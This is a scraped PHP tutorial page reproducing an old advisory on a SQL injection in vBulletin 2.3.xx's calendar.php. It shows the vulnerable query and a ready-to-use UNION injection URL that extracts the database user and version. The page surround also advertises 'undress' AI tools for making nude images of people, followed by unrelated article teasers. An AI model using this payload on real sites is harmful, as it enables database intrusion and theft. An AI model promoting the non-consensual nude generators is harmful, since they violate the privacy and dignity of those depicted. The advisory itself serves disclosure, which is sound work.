vBulletinForum2.3.xxSQLInjection_PHP-PHP Tutorial-php.cn

Home

Backend Development

PHP Tutorial

vBulletinForum2.3.xxSQLInjection_PHP

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 01, 2016 pm 12:38 PM

action in public the

SQLinjectionVBulletin

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

Assassin's Creed Shadows: Seashell Riddle Solution

3 weeks ago By DDD

What's New in Windows 11 KB5054979 & How to Fix Update Issues

2 weeks ago By DDD

Where to find the Crane Control Keycard in Atomfall

3 weeks ago By DDD

Saving in R.E.P.O. Explained (And Save Files)

1 months ago By 尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows - How To Find The Blacksmith And Unlock Weapon And Armour Customisation

4 weeks ago By DDD

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7569

CakePHP Tutorial

1386

What is the format of the account name of steam

win11 activation key permanent

nyt connections hints and answers

108

Related knowledge

After 2 months, the humanoid robot Walker S can fold clothes Apr 03, 2024 am 08:01 AM

Editor of Machine Power Report: Wu Xin The domestic version of the humanoid robot + large model team completed the operation task of complex flexible materials such as folding clothes for the first time. With the unveiling of Figure01, which integrates OpenAI's multi-modal large model, the related progress of domestic peers has been attracting attention. Just yesterday, UBTECH, China's "number one humanoid robot stock", released the first demo of the humanoid robot WalkerS that is deeply integrated with Baidu Wenxin's large model, showing some interesting new features. Now, WalkerS, blessed by Baidu Wenxin’s large model capabilities, looks like this. Like Figure01, WalkerS does not move around, but stands behind a desk to complete a series of tasks. It can follow human commands and fold clothes

DJI Osmo Action 5 Pro: Release date mooted as retailer reveals launch pricing that could undercut GoPro Hero 13 Black Sep 04, 2024 am 06:51 AM

DJI has not confirmed any plans to introduce a new action camera yet. Instead, it seems that GoPro will get ahead of its rival this year, having teased that it will introduce two new action cameras on September 4. For context, these are expected to a

What is the difference between the developer version and the public version of iOS? Mar 01, 2024 pm 12:55 PM

Every year before Apple releases a new major version of iOS and macOS, users can download the beta version several months in advance and experience it first. Since the software is used by both the public and developers, Apple has launched developer and public versions, which are public beta versions of the developer beta version, for both. What is the difference between the developer version and the public version of iOS? Literally speaking, the developer version is a developer test version, and the public version is a public test version. The developer version and the public version target different audiences. The developer version is used by Apple for testing by developers. You need an Apple developer account to download and upgrade it.

Tips for using i18n to implement multi-language switching in Vue Jun 25, 2023 am 09:33 AM

With the continuous development of internationalization, more and more websites and applications need to support multi-language switching functions. As a popular front-end framework, Vue provides a plug-in called i18n that can help us achieve multi-language switching. This article will introduce common techniques for using i18n to implement multi-language switching in Vue. Step 1: Install the i18n plug-in First, we need to install the i18n plug-in using npm or yarn. Enter the following command at the command line: npminst

What do out and in interfaces mean? Sep 28, 2021 pm 04:39 PM

The out interface refers to the output interface, and the in interface refers to the input interface. The out interface generally represents the audio source line output interface, which is used to connect loads, such as speakers, headphones, etc.; while the in interface generally represents the audio source line input interface, which is used to connect CD players, mobile phones, MP3 players, computers, etc.

New DJI Osmo action camera spotted before probable summer 2024 launch to rival recent GoPro and Insta360 releases Jul 01, 2024 am 09:49 AM

Almost a year has passed since DJI released the Osmo Action 4 (curr. $299 on Amazon). Since then, the company has focused on its other divisions, including new RS camera gimbals. On top of that, it has introduced various drones as well like the Avata

Java function access permission modifier public usage guide Apr 26, 2024 am 08:39 AM

The Java public access modifier allows functions to be accessed from anywhere and is used to declare public APIs and define tools and utilities that are shared across packages or classes. The specific usage is as follows: Syntax: public return value type function name (parameter list) {...} Scenario: functions that need to be accessed from anywhere, methods in public APIs, shared tools or utilities

What currency is THE? Is THE coin worth investing in? Feb 21, 2024 pm 03:49 PM

What currency is THE? THE (Tokenized Healthcare Ecosystem) is a digital currency that uses blockchain technology to focus on innovation and reform in the healthcare industry. THE coin's mission is to use blockchain technology to improve the efficiency and transparency of the medical industry and promote more efficient cooperation among all parties, including patients, medical staff, pharmaceutical companies and medical institutions. The Value and Characteristics of THE Coin First of all, THE Coin, as a digital currency, has the advantages of blockchain - decentralization, high security, transparent transactions, etc., allowing participants to trust and rely on this system. Secondly, the uniqueness of THE coin is that it focuses on the medical and health industry, using blockchain technology to transform the traditional medical system and improve

See all articles